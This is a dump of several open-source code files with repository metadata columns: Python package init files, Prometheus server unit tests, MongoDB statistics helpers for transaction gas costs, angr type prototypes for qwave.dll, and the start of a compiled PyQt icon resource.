| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 5d77a89c22e791f4f5930972be59bcb8c1aca8b4
| 173
| py
| Python
| bbq/archives/__init__.py
| agaier/bbq
| ff140f86abca18ed8ba814dc3d4035f86cc18518
| ["MIT"] | null | null | null
| bbq/archives/__init__.py
| agaier/bbq
| ff140f86abca18ed8ba814dc3d4035f86cc18518
| ["MIT"] | null | null | null
| bbq/archives/__init__.py
| agaier/bbq
| ff140f86abca18ed8ba814dc3d4035f86cc18518
| ["MIT"] | null | null | null
from bbq.archives.grid_archive import GridArchive
from bbq.archives.grid_archive import GridArchive_Obj
__all__ = [
GridArchive,
GridArchive_Obj,
]
| 21.625
| 53
| 0.722543
| 19
| 173
| 6.157895
| 0.473684
| 0.119658
| 0.25641
| 0.324786
| 0.735043
| 0.735043
| 0.735043
| 0
| 0
| 0
| 0
| 0
| 0.225434
| 173
| 7
| 54
| 24.714286
| 0.873134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 7
| 5d79c88283ebb6f37d0393451e45637a8bc6dfa1
| 181
| py
| Python
| LimPy/__init__.py
| UWPRG/LimPy
| 2a2979306ec4264de31d5ce1d2f8a59bd6eb7e9c
| ["BSD-2-Clause"] | 1
| 2017-11-08T00:53:03.000Z
| 2017-11-08T00:53:03.000Z
| LimPy/__init__.py
| UWPRG/LimPy
| 2a2979306ec4264de31d5ce1d2f8a59bd6eb7e9c
| ["BSD-2-Clause"] | null | null | null
| LimPy/__init__.py
| UWPRG/LimPy
| 2a2979306ec4264de31d5ce1d2f8a59bd6eb7e9c
| ["BSD-2-Clause"] | 2
| 2019-01-09T06:59:10.000Z
| 2019-01-18T14:58:50.000Z
from . import langevin_functions
from . import potential_class
from . import boundarycondition
from . import statistical_functions
from . import simulate1D
from . import simulate2D
| 25.857143
| 35
| 0.834254
| 21
| 181
| 7.047619
| 0.47619
| 0.405405
| 0.256757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012739
| 0.132597
| 181
| 6
| 36
| 30.166667
| 0.929936
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 7
| 5d9691c7031da5f1676a875af2e4846707aafb76
| 2,796
| py
| Python
| tests/unit/test_server.py
| canonical/prometheus-k8s-operator
| 8f93ba78447b4c15e36f3f4673cb60068a099983
| ["Apache-2.0"] | 2
| 2022-02-14T21:39:05.000Z
| 2022-03-30T06:57:01.000Z
| tests/unit/test_server.py
| canonical/prometheus-k8s-operator
| 8f93ba78447b4c15e36f3f4673cb60068a099983
| ["Apache-2.0"] | 58
| 2021-12-08T10:57:09.000Z
| 2022-03-30T13:59:06.000Z
| tests/unit/test_server.py
| canonical/prometheus-k8s-operator
| 8f93ba78447b4c15e36f3f4673cb60068a099983
| ["Apache-2.0"] | 4
| 2021-12-14T02:10:43.000Z
| 2022-03-10T13:51:07.000Z
# Copyright 2020 Canonical Ltd.
# See LICENSE file for licensing details.
import unittest
import responses
from prometheus_server import Prometheus
class TestServerPrefix(unittest.TestCase):
@responses.activate
def test_prometheus_server_without_route_prefix_returns_valid_data(self):
self.prometheus = Prometheus("localhost", 9090)
version = "1.0.0"
responses.add(
responses.GET,
"http://localhost:9090/api/v1/status/buildinfo",
json={
"status": "success",
"data": {"version": version},
},
status=200,
)
got_version = self.prometheus.version()
self.assertEqual(got_version, version)
@responses.activate
def test_prometheus_server_without_route_prefix_reload_configuration_success(self):
self.prometheus = Prometheus("localhost", 9090)
responses.add(
responses.POST,
"http://localhost:9090/-/reload",
status=200,
)
self.assertTrue(self.prometheus.reload_configuration())
@responses.activate
def test_prometheus_server_without_route_prefix_reload_configuration_failure(self):
self.prometheus = Prometheus("localhost", 9090)
responses.add(
responses.POST,
"http://localhost:9090/-/reload",
status=500,
)
self.assertFalse(self.prometheus.reload_configuration())
@responses.activate
def test_prometheus_server_with_route_prefix_returns_valid_data(self):
self.prometheus = Prometheus("localhost", 9090, "/foobar")
version = "1.0.0"
responses.add(
responses.GET,
"http://localhost:9090/foobar/api/v1/status/buildinfo",
json={
"status": "success",
"data": {"version": version},
},
status=200,
)
got_version = self.prometheus.version()
self.assertEqual(got_version, version)
@responses.activate
def test_prometheus_server_with_route_prefix_reload_configuration_success(self):
self.prometheus = Prometheus("localhost", 9090, "/foobar")
responses.add(
responses.POST,
"http://localhost:9090/foobar/-/reload",
status=200,
)
self.assertTrue(self.prometheus.reload_configuration())
@responses.activate
def test_prometheus_server_with_route_prefix_reload_configuration_failure(self):
self.prometheus = Prometheus("localhost", 9090, "/foobar")
responses.add(
responses.POST,
"http://localhost:9090/foobar/-/reload",
status=500,
)
self.assertFalse(self.prometheus.reload_configuration())
| 28.824742
| 87
| 0.625179
| 267
| 2,796
| 6.333333
| 0.205993
| 0.09935
| 0.070964
| 0.085157
| 0.901833
| 0.901833
| 0.901833
| 0.898285
| 0.898285
| 0.829687
| 0
| 0.038217
| 0.270029
| 2,796
| 96
| 88
| 29.125
| 0.790299
| 0.024678
| 0
| 0.714286
| 0
| 0
| 0.133627
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 1
| 0.085714
| false
| 0
| 0.042857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 5dcd4541e8774ac55f9cddf89ec35fed6c9d7985
| 12,693
| py
| Python
| web/get_db.py
| RightMesh/payment-channel-performance
| 3abde2d4d32353e212a49c946cb8222f297379e7
| ["MIT"] | null | null | null
| web/get_db.py
| RightMesh/payment-channel-performance
| 3abde2d4d32353e212a49c946cb8222f297379e7
| ["MIT"] | 43
| 2019-01-25T23:54:27.000Z
| 2019-04-09T02:36:52.000Z
| web/get_db.py
| RightMesh/payment-channel-performance
| 3abde2d4d32353e212a49c946cb8222f297379e7
| ["MIT"] | 1
| 2019-04-27T00:17:44.000Z
| 2019-04-27T00:17:44.000Z
import pymongo
from pymongo.errors import BulkWriteError
from lib.db import DB
from bson import ObjectId, Code
import json
import os
MONGO_INITDB_DATABASE = os.environ.get('MONGO_INITDB_DATABASE')
BATCH_INTERVAL = int(os.environ.get('BATCH_INTERVAL'))
class JSONEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, ObjectId):
return str(o)
return json.JSONEncoder.default(self, o)
def get_summary_all():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
doc = col_summary.find()
results = []
for row in doc:
row = JSONEncoder().encode(row)
results.append(row)
return results
def get_summary(num):
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
doc = col_summary.find().limit(num)
results = []
for row in doc:
item = {"waiting_time":(row["waiting_time"] + row["waiting_mined_time"]), "actual_cost":row["actual_cost"], "gas_price":row["gas_price"]}
results.append(item)
return results
def get_count():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
count_total = col_summary.count()
count_details = col_summary.count({ '$and': [ {'waiting_time': {'$ne': 0}}, {'actual_cost': {'$ne': 0}} ]})
return (count_total,count_details)
def get_cost_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'actual_cost': {'$ne': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['actual_cost'], 'value': (row['waiting_time'] + row['waiting_mined_time'])}
# row = JSONEncoder().encode(row)
results.append(item)
return results
def get_cost_avg_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.actual_cost, (this.waiting_time + this.waiting_mined_time));
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'actual_cost': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_cost", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_cost_median_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.actual_cost, (this.waiting_time + this.waiting_mined_time));
}
""")
reducer = Code("""
function(key, values) {
values = values.sort(function(a, b){ return a - b; });
var i = values.length / 2;
return i % 1 == 0 ? (values[i - 1] + values[i]) / 2 : values[Math.floor(i)];
}
""")
query = {'waiting_time': {'$ne': 0.0}, 'actual_cost': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_cost", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_gas_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['gas_price'], 'value': (row['waiting_time'] + row['waiting_mined_time'])}
# row = JSONEncoder().encode(row)
results.append(item)
return results
def get_gas_avg_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.gas_price, (this.waiting_time + this.waiting_mined_time));
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_gas_median_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.gas_price, (this.waiting_time + this.waiting_mined_time));
}
""")
reducer = Code("""
function(key, values) {
values = values.sort(function(a, b){ return a - b; });
var i = values.length / 2;
return i % 1 == 0 ? (values[i - 1] + values[i]) / 2 : values[Math.floor(i)];
}
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_avg_mined_time():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.gas_price, this.waiting_mined_time);
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_median_mined_time():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.gas_price, this.waiting_mined_time);
}
""")
reducer = Code("""
function(key, values) {
values = values.sort(function(a, b){ return a - b; });
var i = values.length / 2;
return i % 1 == 0 ? (values[i - 1] + values[i]) / 2 : values[Math.floor(i)];
}
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_waiting_mined_time():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['gas_price'], 'value': (row['waiting_mined_time'])}
# row = JSONEncoder().encode(row)
results.append(item)
return results
def get_block_avg_gas():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.blocknumber, this.gas_price);
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$gt': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_block_avg_cost():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.blocknumber, this.actual_cost);
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'actual_cost': {'$gt': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_block_and_fee():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$gt': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['blocknumber'], 'value': row['gas_price'], 'actual_cost': row['actual_cost'], 'txhash': row['txhash']}
results.append(item)
return results
def get_waiting_time():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['gas_price'], 'value': (row['waiting_time'])}
results.append(item)
return results
def write_to_file(file, results):
with open(file, 'w') as outfile:
json.dump(results, outfile)
def update_summary(file):
data = []
items = []
result = 0
# Get all data
with open('data.json') as json_file:
data = json.load(json_file)
json_file.close()
for row in data:
row = json.loads(row)
item = {"txhash": row["txhash"], "blocknumber": row["blocknumber"], "blocktime": row["blocktime"], "waiting_time": row["waiting_time"], "actual_cost": row["actual_cost"], "gas_price": row["gas_price"], "waiting_mined_time": row["waiting_mined_time"]}
items.append(item)
if(len(items) > 0):
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
try:
result = col_summary.insert_many(items, ordered=False)
except BulkWriteError as bwe:
pass
# Return the number of inserted items
return result
def generate_report(file):
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0}}
doc = col_summary.find(query)
items = []
result = 0
for row in doc:
start_time = row['blocktime'] - row['waiting_mined_time']
confirmed_time = row['blocktime'] + row['waiting_time']
item = {'txhash': row['txhash'], 'start_time': start_time, 'blocktime':row['blocktime'],'confirmed_time':confirmed_time,'gas_price':row['gas_price'],'actual_cost': row['actual_cost']}
items.append(item)
if(len(items) > 0):
col_report = db["report"]
col_report.create_index([('txhash', pymongo.ASCENDING)], unique = True)
try:
result = col_report.insert_many(items, ordered=False)
except BulkWriteError as bwe:
pass
# Close db connection
col_summary.close()
col_report.close()
return result
| 30.512019
| 258
| 0.569684
| 1,514
| 12,693
| 4.568692
| 0.087186
| 0.054937
| 0.014457
| 0.046841
| 0.830273
| 0.805407
| 0.795865
| 0.773746
| 0.763915
| 0.763915
| 0
| 0.008477
| 0.284409
| 12,693
| 416
| 259
| 30.512019
| 0.753055
| 0.060112
| 0
| 0.744108
| 0
| 0.010101
| 0.312069
| 0.033451
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06734
| false
| 0.006734
| 0.020202
| 0
| 0.16835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 5dd5be4543a1567fd56ba85dbfff1d22eb5d5847
| 8,167
| py
| Python
| angr/procedures/definitions/win32_qwave.py
| r4b3rt/angr
| c133cfd4f83ffea2a1d9e064241e9459eaabc55f
| ["BSD-2-Clause"] | null | null | null
| angr/procedures/definitions/win32_qwave.py
| r4b3rt/angr
| c133cfd4f83ffea2a1d9e064241e9459eaabc55f
| ["BSD-2-Clause"] | null | null | null
| angr/procedures/definitions/win32_qwave.py
| r4b3rt/angr
| c133cfd4f83ffea2a1d9e064241e9459eaabc55f
| ["BSD-2-Clause"] | null | null | null
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("qwave.dll")
prototypes = \
{
#
'QOSCreateHandle': SimTypeFunction([SimTypePointer(SimStruct({"MajorVersion": SimTypeShort(signed=False, label="UInt16"), "MinorVersion": SimTypeShort(signed=False, label="UInt16")}, name="QOS_VERSION", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Version", "QOSHandle"]),
#
'QOSCloseHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle"]),
#
'QOSStartTrackingClient': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"sa_family": SimTypeShort(signed=False, label="UInt16"), "sa_data": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 14)}, name="SOCKADDR", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "DestAddr", "Flags"]),
#
'QOSStopTrackingClient': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"sa_family": SimTypeShort(signed=False, label="UInt16"), "sa_data": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 14)}, name="SOCKADDR", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "DestAddr", "Flags"]),
#
'QOSEnumerateFlows': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "Size", "Buffer"]),
#
'QOSAddSocketToFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimStruct({"sa_family": SimTypeShort(signed=False, label="UInt16"), "sa_data": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 14)}, name="SOCKADDR", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="QOS_TRAFFIC_TYPE"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "Socket", "DestAddr", "TrafficType", "Flags", "FlowId"]),
#
'QOSRemoveSocketFromFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "Socket", "FlowId", "Flags"]),
#
'QOSSetFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="QOS_SET_FLOW"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "FlowId", "Operation", "Size", "Buffer", "Flags", "Overlapped"]),
#
'QOSQueryFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="QOS_QUERY_FLOW"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "FlowId", "Operation", "Size", "Buffer", "Flags", "Overlapped"]),
#
'QOSNotifyFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="QOS_NOTIFY_FLOW"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "FlowId", "Operation", "Size", "Buffer", "Flags", "Overlapped"]),
#
'QOSCancel': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "Overlapped"]),
}
lib.set_prototypes(prototypes)
| 185.613636
| 1,183
| 0.729644
| 898
| 8,167
| 6.572383
| 0.120267
| 0.173501
| 0.116571
| 0.167401
| 0.852084
| 0.840054
| 0.824975
| 0.824975
| 0.817181
| 0.807523
| 0
| 0.018649
| 0.080813
| 8,167
| 43
| 1,184
| 189.930233
| 0.76755
| 0.003428
| 0
| 0
| 0
| 0
| 0.20037
| 0.008133
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 53dc7caad9a8c39f1bbac704a4770880f0db73d1
| 30,471
| py
| Python
| res_rc.py
| lsldragon/AITranslator
| 70c3dbec40e6aaf250830550ab53fe93d894bae5
| ["MIT"] | null | null | null
| res_rc.py
| lsldragon/AITranslator
| 70c3dbec40e6aaf250830550ab53fe93d894bae5
| ["MIT"] | null | null | null
| res_rc.py
| lsldragon/AITranslator
| 70c3dbec40e6aaf250830550ab53fe93d894bae5
| ["MIT"] | null | null | null
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.0)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x04\x7e\
\x00\
\x00\x01\x00\x01\x00\x10\x10\x00\x00\x01\x00\x20\x00\x68\x04\x00\
\x00\x16\x00\x00\x00\x28\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\
\x00\x01\x00\x20\x00\x00\x00\x00\x00\x30\x04\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\x33\xc5\
\x6a\xc9\x32\xc6\xc5\xc9\x32\xc6\xf5\xca\x32\xc5\xb1\xbf\x40\xbf\
\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\xc7\x34\xc7\x40\xc8\x31\xc6\xc4\xc9\x32\xc6\xe1\xca\x32\xc7\
\x60\xc9\x31\xc5\x9b\xc9\x32\xc6\xff\xc9\x32\xc6\xff\xc9\x33\xc6\
\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcc\x33\xcc\x0a\xcc\x33\xc6\
\x28\xc9\x31\xc7\x68\xc9\x32\xc6\xcc\xc9\x32\xc6\xff\xc9\x32\xc6\
\xff\xc9\x32\xc7\x7f\xca\x32\xc6\x99\xc9\x32\xc6\xff\xc9\x32\xc6\
\xff\xc8\x31\xc5\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\xc6\x39\xc6\x12\xca\x32\xc6\xcd\xc9\x32\xc6\
\xff\xc9\x33\xc6\xe3\xca\x33\xc7\x69\xca\x31\xc6\x81\xc9\x32\xc6\
\xff\xc9\x32\xc6\xff\xc9\x31\xc5\x77\xc9\x32\xc6\xfb\xc9\x32\xc6\
